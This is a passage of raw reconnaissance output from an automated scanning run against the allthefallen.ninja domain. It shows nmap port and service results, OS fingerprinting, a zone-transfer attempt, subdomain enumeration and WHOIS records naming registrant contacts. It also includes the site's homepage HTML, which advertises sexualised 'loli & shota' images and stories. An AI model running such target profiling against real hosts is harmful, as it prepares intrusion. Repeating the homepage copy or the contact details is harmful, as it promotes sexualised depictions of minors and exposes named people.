  639. | 7   116.65 ms be100-1112.ams-5-a9.nl.eu (213.251.128.67)
  640. | 8   116.39 ms be100-2.ams-1-a9.nl.eu (94.23.122.230)
  641. | 9   ...
  642. | 10  116.95 ms server.allthefallen.ninja (178.132.1.137)
  643. |
  644. | NSE: Script Post-scanning.
  645. | Initiating NSE at 13:15
  646. | Completed NSE at 13:15, 0.00s elapsed
  647. | Initiating NSE at 13:15
  648. | Completed NSE at 13:15, 0.00s elapsed
  649. | Read data files from: /usr/bin/../share/nmap
  650. | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  651. | Nmap done: 1 IP address (1 host up) scanned in 90.95 seconds
  652. |            Raw packets sent: 1301 (59.128KB) | Rcvd: 1220 (50.496KB)
  653. ===================================================================================================
  654. ===================================================================================================
  655. Scan end date: 21-12-2017 13:15:30
  656.  
  657. [!] IP Address : 178.132.1.137
  658. [!] Server: nginx
  659. [+] Operating System : Debian&#34;
  660.   },
  661.   &#34;993&#34;: {
  662.     &#34;imaps&#34;: {
  663.       &#34;tls&#34;: {
  664.         &#34;tls&#34;: {
  665.           &#34;server_key_exchange&#34;: {
  666.             &#34;ecdh_params&#34;: {
  667.               &#34;curve_id&#34;: {
  668.                 &#34;id&#34;: 24,
  669.                 &#34;name&#34;: &#34;secp384r1&#34;
  670.               }
  671.             }
  672.           },
  673.           &#34;certificate&#34;: {
  674.             &#34;parsed&#34;: {
  675.               &#34;fingerprint_sha1&#34;: &#34;6241686f86cc75a53150d8df5a172030c4651c28&#34;,
  676.               &#34;tbs_noct_fingerprint&#34;: &#34;b4eaba2dd7c32dbe50483d6ea294904fbe4fa263c2ed955d48349a5f09bb2e91&#34;,
  677.               &#34;subj
  678. [!] allthefallen.ninja doesn't seem to use a CMS
  679. [+] Honeypot Probabilty: 30%
  680. ----------------------------------------
  681. [+] Robots.txt retrieved
  682. <!DOCTYPE html>
  683. <html lang="en">
  684.  
  685.   <head>
  686.  
  687.     <meta charset="utf-8">
  688.     <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  689.     <meta name="description" content="">
  690.     <meta name="author" content="">
  691.  
  692.     <title>All the Fallen</title>
  693.  
  694.     <!-- Bootstrap core CSS -->
  695.     <link href="catchpage/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
  696.  
  697.     <!-- Custom styles for this template -->
  698.     <link href="catchpage/css/heroic-features.css" rel="stylesheet">
  699.  
  700.   </head>
  701.  
  702.   <body>
  703.  
  704.     <!-- Navigation -->
  705.  
  706.     <!-- Page Content -->
  707.     <div class="container">
  708.  
  709.       <!-- Jumbotron Header -->
  710.       <header class="jumbotron my-4 text-center">
  711.         <h1 class="display-3">Welcome to All the Fallen!</h1>
  712.         <p class="lead">This is a simple page for now, we'll be improving this page to fit with our other themes soon!</p>
  713.       </header>
  714.  
  715.       <!-- Page Features -->
  716.       <div class="row text-center">
  717.  
  718.         <div class="col-lg-3 col-md-6 mb-4">
  719.           <div class="card">
  720.             <img class="card-img-top" src="http://placehold.it/500x325" alt="">
  721.             <div class="card-body">
  722.               <h4 class="card-title">Forum</h4>
  723.               <p class="card-text">Access the forum here!.</p>
  724.             </div>
  725.             <div class="card-footer">
  726.               <a href="/forum" class="btn btn-primary">All the Forums!</a>
  727.             </div>
  728.           </div>
  729.         </div>
  730.  
  731.         <div class="col-lg-3 col-md-6 mb-4">
  732.           <div class="card">
  733.             <img class="card-img-top" src="http://placehold.it/500x325" alt="">
  734.             <div class="card-body">
  735.               <h4 class="card-title">Gallery/Booru</h4>
  736.               <p class="card-text">Visit the gallery(booru) for all kinds of loli & shota images.</p>
  737.             </div>
  738.             <div class="card-footer">
  739.               <a href="https://atfbooru.ninja" class="btn btn-primary">ATF Booru!</a>
  740.             </div>
  741.           </div>
  742.         </div>
  743.  
  744.         <div class="col-lg-3 col-md-6 mb-4">
  745.           <div class="card">
  746.             <img class="card-img-top" src="http://placehold.it/500x325" alt="">
  747.             <div class="card-body">
  748.               <h4 class="card-title">Streaming</h4>
  749.               <p class="card-text">Getting tired of streaming services banning any kind of Loli & Shota content or banning you for stupid reasons, we don't do that on our streaming service!</p>
  750.             </div>
  751.             <div class="card-footer">
  752.               <a href="https://stream.allthefallen.ninja" class="btn btn-primary">All the Streams!</a>
  753.             </div>
  754.           </div>
  755.         </div>
  756.         <div class="col-lg-3 col-md-6 mb-4">
  757.           <div class="card">
  758.             <img class="card-img-top" src="http://placehold.it/500x325" alt="">
  759.             <div class="card-body">
  760.               <h4 class="card-title">Translations</h4>
  761.               <p class="card-text">Want to jank it to translated doujins look here and have fun janking it.!</p>
  762.             </div>
  763.             <div class="card-footer">
  764.               <a href="https://translations.allthefallen.ninja" class="btn btn-primary">All the Translations!</a>
  765.             </div>
  766.           </div>
  767.         </div>
  768.  
  769.  
  770.       </div>
  771.      
  772.     <div class="row text-center">
  773.         <div class="col-lg-3 col-md-6 mb-4">
  774.           <div class="card">
  775.             <img class="card-img-top" src="http://placehold.it/500x325" alt="">
  776.             <div class="card-body">
  777.               <h4 class="card-title">Stories</h4>
  778.               <p class="card-text">Want to read a sexy story involving loli & shota go here.</p>
  779.             </div>
  780.             <div class="card-footer">
  781.               <a href="https://stories.allthefallen.ninja" class="btn btn-primary">All the stories!</a>
  782.             </div>
  783.           </div>
  784.         </div>
  785.  
  786.         <div class="col-lg-3 col-md-6 mb-4">
  787.           <div class="card">
  788.             <img class="card-img-top" src="http://placehold.it/500x325" alt="">
  789.             <div class="card-body">
  790.               <h4 class="card-title">Mods</h4>
  791.               <p class="card-text">Want to make playing a game more sexy, look here.</p>
  792.             </div>
  793.             <div class="card-footer">
  794.               <a href="https://mods.allthefallen.ninja" class="btn btn-primary">All the Mods!</a>
  795.             </div>
  796.           </div>
  797.         </div>
  798.  
  799.         <div class="col-lg-3 col-md-6 mb-4">
  800.           <div class="card">
  801.             <img class="card-img-top" src="http://placehold.it/500x325" alt="">
  802.             <div class="card-body">
  803.               <h4 class="card-title">Blogs</h4>
  804.               <p class="card-text">You can make a blog here or read other people blogs!</p>
  805.             </div>
  806.             <div class="card-footer">
  807.               <a href="https://blogs.allthefallen.ninja" class="btn btn-primary">All The Blogs!</a>
  808.             </div>
  809.           </div>
  810.         </div>
  811.  
  812.         <div class="col-lg-3 col-md-6 mb-4">
  813.           <div class="card">
  814.             <img class="card-img-top" src="http://placehold.it/500x325" alt="">
  815.             <div class="card-body">
  816.               <h4 class="card-title">All the Fallen Git</h4>
  817.               <p class="card-text">Git gud</p>
  818.             </div>
  819.             <div class="card-footer">
  820.               <a href="https://git.allthefallen.ninja/" class="btn btn-primary">All The Gits!</a>
  821.             </div>
  822.           </div>
  823.         </div>
  824.  
  825.       </div>
  826.       <!-- /.row -->
  827.  
  828.     </div>
  829.     <!-- /.container -->
  830.  
  831.     <!-- Footer -->
  832.     <footer class="py-2">
  833.       <div class="container">
  834.         <p class="m-0 text-center text-black">Copyright &copy; All The Fallen 2015 - 2017</p>
  835.       </div>
  836.       <!-- /.container -->
  837.     </footer>
  838.  
  839.     <!-- Bootstrap core JavaScript -->
  840.     <script src="catchpage/vendor/jquery/jquery.min.js"></script>
  841.     <script src="catchpage/vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
  842.  
  843.   </body>
  844.  
  845. </html>
  846.  
  847. ----------------------------------------
  848. PORT     STATE  SERVICE       VERSION
  849. 21/tcp   open   ftp           ProFTPD
  850. 22/tcp   open   ssh           OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
  851. 23/tcp   closed telnet
  852. 25/tcp   open   smtp          Postfix smtpd
  853. 80/tcp   open   http          nginx
  854. 110/tcp  open   pop3          Dovecot pop3d
  855. 143/tcp  open   imap          Dovecot imapd
  856. 443/tcp  open   ssl/http      nginx
  857. 445/tcp  closed microsoft-ds
  858. 3389/tcp closed ms-wbt-server
  859. ----------------------------------------
  860.  
  861. [+] DNS Records
  862. ns1.allthefallen.ninja. (178.132.1.137) AS49981 WorldStream B.V. Russian Federation
  863.  
  864. [+] MX Records
  865. 10 (178.132.1.137) AS49981 WorldStream B.V. Russian Federation
  866.  
  867. [+] Host Records (A)
  868. ns1.allthefallen.ninjaHTTP: (server.allthefallen.ninja) (178.132.1.137) AS49981 WorldStream B.V. Russian Federation
  869. social.allthefallen.ninjaHTTP: (server.allthefallen.ninja) (178.132.1.137) AS49981 WorldStream B.V. Russian Federation
  870. panel.allthefallen.ninjaHTTP: (server.allthefallen.ninja) (178.132.1.137) AS49981 WorldStream B.V. Russian Federation
  871. mail.allthefallen.ninjaHTTP: (server.allthefallen.ninja) (178.132.1.137) AS49981 WorldStream B.V. Russian Federation
  872. stream.allthefallen.ninjaHTTP: (server.allthefallen.ninja) (178.132.1.137) AS49981 WorldStream B.V. Russian Federation
  873. mods.allthefallen.ninjaHTTP: (server.allthefallen.ninja) (178.132.1.137) AS49981 WorldStream B.V. Russian Federation
  874. stories.allthefallen.ninjaHTTP: (server.allthefallen.ninja) (178.132.1.137) AS49981 WorldStream B.V. Russian Federation
  875. mail.stories.allthefallen.ninjaHTTP: (server.allthefallen.ninja) (178.132.1.137) AS49981 WorldStream B.V. Russian Federation
  876. blogs.allthefallen.ninjaHTTP: (server.allthefallen.ninja) (178.132.1.137) AS49981 WorldStream B.V. Russian Federation
  877. translations.allthefallen.ninjaHTTP: (server.allthefallen.ninja) (178.132.1.137) AS49981 WorldStream B.V. Russian Federation
  878. streamserv.allthefallen.ninjaHTTP: (streamserv.allthefallen.ninja) (178.132.1.139) AS49981 WorldStream B.V. Russian Federation
  879.  
  880. [+] TXT Records
  881. "v=spf1 a mx -all"
  882.  
  883. [+] DNS Map: https://dnsdumpster.com/static/map/allthefallen.ninja.png
  884.  
  885. [>] Initiating 3 intel modules
  886. [>] Loading Alpha module (1/3)
  887. [>] Beta module deployed (2/3)
  888. [>] Gamma module initiated (3/3)
  889. No emails found
  890.  
  891. [+] Hosts found in search engines:
  892. ------------------------------------
  893. [-] Resolving hostnames IPs...
  894. 178.132.1.137:unidentifiedsfm.blogs.allthefallen.ninja
  895. 178.132.1.137:vaultgirlspremium.blogs.allthefallen.ninja
  896. [+] Virtual hosts:
  897. -----------------
  898. 178.132.1.137   allthefallen
  899. 178.132.1.137   mods.allthefallen.ninja
  900. 178.132.1.137   stories.allthefallen.ninja
  901. 178.132.1.137   stream.allthefallen.ninja
  902. 178.132.1.137   honeyselectcreators.blogs.allthefallen.ninja
  903. 178.132.1.137   translations.allthefallen.ninja
  904. 178.132.1.137   4ere4nik.blogs.allthefallen.ninja
  905. 178.132.1.137   unidentifiedsfm.blogs.allthefallen.ninja
  906. 178.132.1.137   blogs.allthefallen
  907. 178.132.1.137   reinet12345.blogs.allthefallen.ninja
  908. 178.132.1.137   cruelcherry.blogs.allthefallen.ninja
  909. 178.132.1.137   bdkmv5.blogs.allthefallen.ninja
  910. 178.132.1.137   spekkssfm.blogs.allthefallen.ninja
  911. 178.132.1.137   moriso.blogs.allthefallen.ninja
  912. 178.132.1.137   honeyselect.blogs.allthefallen.ninja
  913. 178.132.1.137   maxmouse.blogs.allthefallen
  914. 178.132.1.137   littljack.blogs.allthefallen.ninja
  915. 178.132.1.137   torpedo.blogs.allthefallen.ninja
  916. 178.132.1.137   incubator.blogs.allthefallen
  917. 178.132.1.137   unidentifiedsfm
  918. 178.132.1.137   vaultgirlspremium
  919. [92m + -- ----------------------------=[Running Nslookup]=------------------------ -- +
  920. Server:     2001:568:ff09:10c::53
  921. Address:    2001:568:ff09:10c::53#53
  922.  
  923. Non-authoritative answer:
  924. Name:   allthefallen.ninja
  925. Address: 178.132.1.137
  926.  
  927. allthefallen.ninja has address 178.132.1.137
  928. allthefallen.ninja mail is handled by 10 mail.allthefallen.ninja.
  929.  + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
  930.  
  931. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  932.  
  933. [+] Target is allthefallen.ninja
  934. [+] Loading modules.
  935. [+] Following modules are loaded:
  936. [x] [1] ping:icmp_ping  -  ICMP echo discovery module
  937. [x] [2] ping:tcp_ping  -  TCP-based ping discovery module
  938. [x] [3] ping:udp_ping  -  UDP-based ping discovery module
  939. [x] [4] infogather:ttl_calc  -  TCP and UDP based TTL distance calculation
  940. [x] [5] infogather:portscan  -  TCP and UDP PortScanner
  941. [x] [6] fingerprint:icmp_echo  -  ICMP Echo request fingerprinting module
  942. [x] [7] fingerprint:icmp_tstamp  -  ICMP Timestamp request fingerprinting module
  943. [x] [8] fingerprint:icmp_amask  -  ICMP Address mask request fingerprinting module
  944. [x] [9] fingerprint:icmp_port_unreach  -  ICMP port unreachable fingerprinting module
  945. [x] [10] fingerprint:tcp_hshake  -  TCP Handshake fingerprinting module
  946. [x] [11] fingerprint:tcp_rst  -  TCP RST fingerprinting module
  947. [x] [12] fingerprint:smb  -  SMB fingerprinting module
  948. [x] [13] fingerprint:snmp  -  SNMPv2c fingerprinting module
  949. [+] 13 modules registered
  950. [+] Initializing scan engine
  951. [+] Running scan engine
  952. [-] ping:tcp_ping module: no closed/open TCP ports known on 178.132.1.137. Module test failed
  953. [-] ping:udp_ping module: no closed/open UDP ports known on 178.132.1.137. Module test failed
  954. [-] No distance calculation. 178.132.1.137 appears to be dead or no ports known
  955. [+] Host: 178.132.1.137 is up (Guess probability: 50%)
  956. [+] Target: 178.132.1.137 is alive. Round-Trip Time: 0.47153 sec
  957. [+] Selected safe Round-Trip Time value is: 0.94306 sec
  958. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
  959. [-] fingerprint:smb need either TCP port 139 or 445 to run
  960. [+] Primary guess:
  961. [+] Host 178.132.1.137 Running OS:  þV (Guess probability: 100%)
  962. [+] Other guesses:
  963. [+] Host 178.132.1.137 Running OS:  þV (Guess probability: 100%)
  964. [+] Host 178.132.1.137 Running OS:  þV (Guess probability: 100%)
  965. [+] Host 178.132.1.137 Running OS:  þV (Guess probability: 100%)
  966. [+] Host 178.132.1.137 Running OS:  þV (Guess probability: 100%)
  967. [+] Host 178.132.1.137 Running OS:  þV (Guess probability: 100%)
  968. [+] Host 178.132.1.137 Running OS:  þV (Guess probability: 100%)
  969. [+] Host 178.132.1.137 Running OS:  þV (Guess probability: 100%)
  970. [+] Host 178.132.1.137 Running OS:  þV (Guess probability: 100%)
  971. [+] Host 178.132.1.137 Running OS:  þV (Guess probability: 100%)
  972. [+] Cleaning up scan engine
  973. [+] Modules deinitialized
  974. [+] Execution completed.
  975.  + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
  976. Domain Name: allthefallen.ninja
  977. Registry Domain ID: 9b104e31e74549e6a85a1f86e9aed1ed-RSIDE
  978. Registrar WHOIS Server: www.ovh.com/cgi-bin/whois.pl
  979. Registrar URL: http://www.ovh.com
  980. Updated Date: 2017-10-09T17:58:35Z
  981. Creation Date: 2015-03-21T06:25:40Z
  982. Registry Expiry Date: 2018-03-21T06:25:40Z
  983. Registrar: OVH SAS
  984. Registrar IANA ID: 433
  985. Registrar Abuse Contact Email:
  986. Registrar Abuse Contact Phone:
  987. Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
  988. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  989. Registry Registrant ID: fbec711e9dcd4d219c46dfcc9fff3e69-RSIDE
  990. Registrant Name: Conor Aoihino
  991. Registrant Organization:
  992. Registrant Street: office #8912666 c/o OwO, BP80157
  993. Registrant City: Roubaix Cedex 1
  994. Registrant State/Province:
  995. Registrant Postal Code: 59053
  996. Registrant Country: FR
  997. Registrant Phone: +33.972101007
  998. Registrant Phone Ext:
  999. Registrant Fax:
  1000. Registrant Fax Ext:
  1001. Registrant Email: ok1nr92vksn9v40on6yk@w.o-w-o.info
  1002. Registry Admin ID: 4ce5139f7ef64cccae00b13b5359de9d-RSIDE
  1003. Admin Name: Michel Kleine Deters
  1004. Admin Organization:
  1005. Admin Street: office #8912666 c/o OwO, BP80157
  1006. Admin City: Roubaix Cedex 1
  1007. Admin State/Province:
  1008. Admin Postal Code: 59053
  1009. Admin Country: FR
  1010. Admin Phone: +33.972101007
  1011. Admin Phone Ext:
  1012. Admin Fax:
  1013. Admin Fax Ext:
  1014. Admin Email: ojafihf06palb4pl1k6l@b.o-w-o.info
  1015. Registry Tech ID: 4ce5139f7ef64cccae00b13b5359de9d-RSIDE
  1016. Tech Name: Michel Kleine Deters
  1017. Tech Organization:
  1018. Tech Street: office #8912666 c/o OwO, BP80157
  1019. Tech City: Roubaix Cedex 1
  1020. Tech State/Province:
  1021. Tech Postal Code: 59053
  1022. Tech Country: FR
  1023. Tech Phone: +33.972101007
  1024. Tech Phone Ext:
  1025. Tech Fax:
  1026. Tech Fax Ext:
  1027. Tech Email: ojafihf06palb4pl1k6l@b.o-w-o.info
  1028. Name Server: server.allthefallen.ninja
  1029. Name Server: serverns1.allthefallen.ninja
  1030. DNSSEC: unsigned
  1031. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  1032. >>> Last update of WHOIS database: 2017-12-21T18:08:47Z <<<
  1033.  
  1034. For more information on Whois status codes, please visit https://icann.org/epp
  1035.  
  1036. Terms of Use: Users accessing the Rightside WHOIS service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: Allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers. Enable high volume, automated, electronic processes that send queries or data to the systems of Rightside or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Rightside Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources.
  1037.  + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
  1038.  
  1039. *******************************************************************
  1040. *                                                                 *
  1041. * | |_| |__   ___    /\  /\__ _ _ ____   _____  ___| |_ ___ _ __  *
  1042. * | __| '_ \ / _ \  / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
  1043. * | |_| | | |  __/ / __  / (_| | |   \ V /  __/\__ \ ||  __/ |    *
  1044. *  \__|_| |_|\___| \/ /_/ \__,_|_|    \_/ \___||___/\__\___|_|    *
  1045. *                                                                 *
  1046. * TheHarvester Ver. 2.7                                           *
  1047. * Coded by Christian Martorella                                   *
  1048. * Edge-Security Research                                          *
  1049. * cmartorella@edge-security.com                                   *
  1050. *******************************************************************
  1051.  
  1052.  
  1053. Full harvest..
  1054. [-] Searching in Google..
  1055.     Searching 0 results...
  1056.     Searching 100 results...
  1057.     Searching 200 results...
  1058. [-] Searching in PGP Key server..
  1059. [-] Searching in Bing..
  1060.     Searching 50 results...
  1061.     Searching 100 results...
  1062.     Searching 150 results...
  1063.     Searching 200 results...
  1064. [-] Searching in Exalead..
  1065.     Searching 50 results...
  1066.     Searching 100 results...
  1067.     Searching 150 results...
  1068.     Searching 200 results...
  1069.     Searching 250 results...
  1070.  
  1071.  
  1072. [+] Emails found:
  1073. ------------------
  1074. No emails found
  1075.  
  1076. [+] Hosts found in search engines:
  1077. ------------------------------------
  1078. [-] Resolving hostnames IPs...
  1079. 178.132.1.137:unidentifiedsfm.blogs.allthefallen.ninja
  1080. 178.132.1.137:vaultgirlspremium.blogs.allthefallen.ninja
  1081. [+] Virtual hosts:
  1082. ==================
  1083.  
  1084. ******************************************************
  1085. *     /\/\   ___| |_ __ _  __ _  ___   ___  / _(_) | *
  1086. *    /    \ / _ \ __/ _` |/ _` |/ _ \ / _ \| |_| | | *
  1087. *   / /\/\ \  __/ || (_| | (_| | (_) | (_) |  _| | | *
  1088. *   \/    \/\___|\__\__,_|\__, |\___/ \___/|_| |_|_| *
  1089. *                         |___/                      *
  1090. * Metagoofil Ver 2.2                                 *
  1091. * Christian Martorella                               *
  1092. * Edge-Security.com                                  *
  1093. * cmartorella_at_edge-security.com                   *
  1094. ****************************************************** 
  1095.  
  1096. [-] Starting online search...
  1097.  
  1098. [-] Searching for doc files, with a limit of 200
  1099.     Searching 100 results...
  1100.     Searching 200 results...
  1101. Results: 0 files found
  1102. Starting to download 50 of them:
  1103. ----------------------------------------
  1104.  
  1105.  
  1106. [-] Searching for pdf files, with a limit of 200
  1107.     Searching 100 results...
  1108.     Searching 200 results...
  1109. Results: 0 files found
  1110. Starting to download 50 of them:
  1111. ----------------------------------------
  1112.  
  1113.  
  1114. [-] Searching for xls files, with a limit of 200
  1115.     Searching 100 results...
  1116.     Searching 200 results...
  1117. Results: 0 files found
  1118. Starting to download 50 of them:
  1119. ----------------------------------------
  1120.  
  1121.  
  1122. [-] Searching for csv files, with a limit of 200
  1123.     Searching 100 results...
  1124.     Searching 200 results...
  1125. Results: 0 files found
  1126. Starting to download 50 of them:
  1127. ----------------------------------------
  1128.  
  1129.  
  1130. [-] Searching for txt files, with a limit of 200
  1131.     Searching 100 results...
  1132.     Searching 200 results...
  1133. Results: 0 files found
  1134. Starting to download 50 of them:
  1135. ----------------------------------------
  1136.  
  1137. processing
  1138. user
  1139. email
  1140.  
  1141. [+] List of users found:
  1142. --------------------------
  1143.  
  1144. [+] List of software found:
  1145. -----------------------------
  1146.  
  1147. [+] List of paths and servers found:
  1148. ---------------------------------------
  1149.  
  1150. [+] List of e-mails found:
  1151. ----------------------------
  1152.  + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
  1153.  
  1154. ; <<>> DiG 9.11.2-5-Debian <<>> -x allthefallen.ninja
  1155. ;; global options: +cmd
  1156. ;; Got answer:
  1157. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 36360
  1158. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  1159.  
  1160. ;; OPT PSEUDOSECTION:
  1161. ; EDNS: version: 0, flags:; udp: 4096
  1162. ;; QUESTION SECTION:
  1163. ;ninja.allthefallen.in-addr.arpa. IN    PTR
  1164.  
  1165. ;; AUTHORITY SECTION:
  1166. in-addr.arpa.       3600    IN  SOA b.in-addr-servers.arpa. nstld.iana.org. 2017102481 1800 900 604800 3600
  1167.  
  1168. ;; Query time: 491 msec
  1169. ;; SERVER: 2001:568:ff09:10c::53#53(2001:568:ff09:10c::53)
  1170. ;; WHEN: Thu Dec 21 13:16:13 EST 2017
  1171. ;; MSG SIZE  rcvd: 128
  1172.  
  1173. dnsenum VERSION:1.2.4
  1174. 
  1175. -----   allthefallen.ninja   -----
  1176. 
  1177.  
  1178. Host's addresses:
  1179. __________________
  1180.  
  1181. allthefallen.ninja.                      10263    IN    A        178.132.1.137
  1182. 
  1183.  
  1184. Name Servers:
  1185. ______________
  1186.  
  1187. ns1.allthefallen.ninja.                  10649    IN    A        178.132.1.137
  1188. 
  1189.  
  1190. Mail (MX) Servers:
  1191. ___________________
  1192.  
  1193. mail.allthefallen.ninja.                 10800    IN    A        178.132.1.137
  1194. 
  1195.  
  1196. Trying Zone Transfers and getting Bind Versions:
  1197. _________________________________________________
  1198.  
  1199. 
  1200. Trying Zone Transfer for allthefallen.ninja on ns1.allthefallen.ninja ...
  1201.  
  1202. brute force file not specified, bay.
  1203.  + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
  1204. 
  1205.                  ____        _     _ _     _   _____
  1206.                 / ___| _   _| |__ | (_)___| |_|___ / _ __
  1207.                 \___ \| | | | '_ \| | / __| __| |_ \| '__|
  1208.                  ___) | |_| | |_) | | \__ \ |_ ___) | |
  1209.                 |____/ \__,_|_.__/|_|_|___/\__|____/|_|
  1210.  
  1211.                 # Coded By Ahmed Aboul-Ela - @aboul3la
  1212.    
  1213. [-] Enumerating subdomains now for allthefallen.ninja
  1214. [-] verbosity is enabled, will show the subdomains results in realtime
  1215. [-] Searching now in Baidu..
  1216. [-] Searching now in Yahoo..
  1217. [-] Searching now in Google..
  1218. [-] Searching now in Bing..
  1219. [-] Searching now in Ask..
  1220. [-] Searching now in Netcraft..
  1221. [-] Searching now in DNSdumpster..
  1222. [-] Searching now in Virustotal..
  1223. [-] Searching now in ThreatCrowd..
  1224. [-] Searching now in SSL Certificates..
  1225. [-] Searching now in PassiveDNS..
  1226. ThreatCrowd: www.allthefallen.ninja
  1227. Virustotal: darkwooddragon.blogs.allthefallen.ninja
  1228. Virustotal: elrincondelclick.blogs.allthefallen.ninja
  1229. Virustotal: funnybizness.blogs.allthefallen.ninja
  1230. Virustotal: garured.blogs.allthefallen.ninja
  1231. Virustotal: striderskunk.blogs.allthefallen.ninja
  1232. Virustotal: lew9876.blogs.allthefallen.ninja
  1233. Virustotal: mrexclusive.blogs.allthefallen.ninja
  1234. Virustotal: n3fdraws.blogs.allthefallen.ninja
  1235. Virustotal: denofdeviance.blogs.allthefallen.ninja
  1236. Virustotal: zlata.blogs.allthefallen.ninja
  1237. Virustotal: riggs.blogs.allthefallen.ninja
  1238. Virustotal: reinet12345.blogs.allthefallen.ninja
  1239. Virustotal: git.allthefallen.ninja
  1240. Virustotal: u2764.blogs.allthefallen.ninja
  1241. Virustotal: mico946.blogs.allthefallen.ninja
  1242. Virustotal: dodocat.blogs.allthefallen.ninja
  1243. Virustotal: cyncyn.blogs.allthefallen.ninja
  1244. Virustotal: dariusex007.blogs.allthefallen.ninja
  1245. Virustotal: tobiwong.blogs.allthefallen.ninja
  1246. Virustotal: dodocatsbrats.blogs.allthefallen.ninja
  1247. Virustotal: moriso.blogs.allthefallen.ninja
  1248. Virustotal: sims4mod.blogs.allthefallen.ninja
  1249. Virustotal: vaultgirlspremium.blogs.allthefallen.ninja
  1250. Virustotal: atfacademy.blogs.allthefallen.ninja
  1251. Virustotal: doctorpotpot.blogs.allthefallen.ninja
  1252. Virustotal: streamserv.allthefallen.ninja
  1253. Virustotal: incubator.blogs.allthefallen.ninja
  1254. Virustotal: ookami.blogs.allthefallen.ninja
  1255. Virustotal: mods.allthefallen.ninja
  1256. Virustotal: social.allthefallen.ninja
  1257. Virustotal: sorocon.blogs.allthefallen.ninja
  1258. Virustotal: torpedo.blogs.allthefallen.ninja
  1259. Virustotal: honeyselectcreators.blogs.allthefallen.ninja
  1260. Virustotal: aka2.blogs.allthefallen.ninja
  1261. Virustotal: dragonbomb.blogs.allthefallen.ninja
  1262. Virustotal: ssss111.blogs.allthefallen.ninja
  1263. Virustotal: sunsystem.blogs.allthefallen.ninja
  1264. Virustotal: krigenz.blogs.allthefallen.ninja
  1265. Virustotal: gangaste.blogs.allthefallen.ninja
  1266. Virustotal: loxiza.blogs.allthefallen.ninja
  1267. Virustotal: quelthias.blogs.allthefallen.ninja
  1268. Virustotal: spekkssfm.blogs.allthefallen.ninja
  1269. Virustotal: jecb8421.blogs.allthefallen.ninja
  1270. Virustotal: timmy.blogs.allthefallen.ninja
  1271. Virustotal: anjovirtua.blogs.allthefallen.ninja
  1272. Virustotal: equestriangirls.blogs.allthefallen.ninja
  1273. Virustotal: henloli.blogs.allthefallen.ninja
  1274. Virustotal: fuckheadmanip.blogs.allthefallen.ninja
  1275. Virustotal: bdkmv5.blogs.allthefallen.ninja
  1276. Virustotal: 4ere4nik.blogs.allthefallen.ninja
  1277. Virustotal: kiralushia.blogs.allthefallen.ninja
  1278. Virustotal: trex.blogs.allthefallen.ninja
  1279. Virustotal: pride.blogs.allthefallen.ninja
  1280. Virustotal: biserbyrov.blogs.allthefallen.ninja
  1281. Virustotal: littljack.blogs.allthefallen.ninja
  1282. Virustotal: stream.allthefallen.ninja
  1283. Virustotal: mangaforms.blogs.allthefallen.ninja
  1284. Virustotal: cruelcherry.blogs.allthefallen.ninja
  1285. Virustotal: reader.allthefallen.ninja
  1286. Virustotal: honeyselect.blogs.allthefallen.ninja
  1287. Virustotal: elerneron.blogs.allthefallen.ninja
  1288. Virustotal: felixzane.blogs.allthefallen.ninja
  1289. Virustotal: load.blogs.allthefallen.ninja
  1290. Virustotal: blogs.allthefallen.ninja
  1291. Virustotal: flatsims.blogs.allthefallen.ninja
  1292. Virustotal: unidentifiedsfm.blogs.allthefallen.ninja
  1293. Virustotal: translations.allthefallen.ninja
  1294. Virustotal: unidentifiedsfm.creations.allthefallen.ninja
  1295. Virustotal: stories.allthefallen.ninja
  1296. Virustotal: www.allthefallen.ninja
  1297. SSL Certificates: 4ere4nik.blogs.allthefallen.ninja
  1298. SSL Certificates: alexf4.blogs.allthefallen.ninja
  1299. SSL Certificates: amandare.blogs.allthefallen.ninja
  1300. SSL Certificates: anarkhy.blogs.allthefallen.ninja
  1301. SSL Certificates: anatolian22.blogs.allthefallen.ninja
  1302. SSL Certificates: aofc.blogs.allthefallen.ninja
  1303. SSL Certificates: atfacademy.blogs.allthefallen.ninja
  1304. SSL Certificates: blogs.allthefallen.ninja
  1305. SSL Certificates: bzerka.blogs.allthefallen.ninja
  1306. SSL Certificates: caretaker.blogs.allthefallen.ninja
  1307. SSL Certificates: creat10n.blogs.allthefallen.ninja
  1308. SSL Certificates: cruelcherry.blogs.allthefallen.ninja
  1309. SSL Certificates: danielsilva.blogs.allthefallen.ninja
  1310. SSL Certificates: decalxps.blogs.allthefallen.ninja
  1311. SSL Certificates: denofdeviance.blogs.allthefallen.ninja
  1312. SSL Certificates: diewellet.blogs.allthefallen.ninja
  1313. SSL Certificates: dodocatsbrats.blogs.allthefallen.ninja
  1314. SSL Certificates: don12.blogs.allthefallen.ninja
  1315. SSL Certificates: e1010.blogs.allthefallen.ninja
  1316. SSL Certificates: elvis57.blogs.allthefallen.ninja
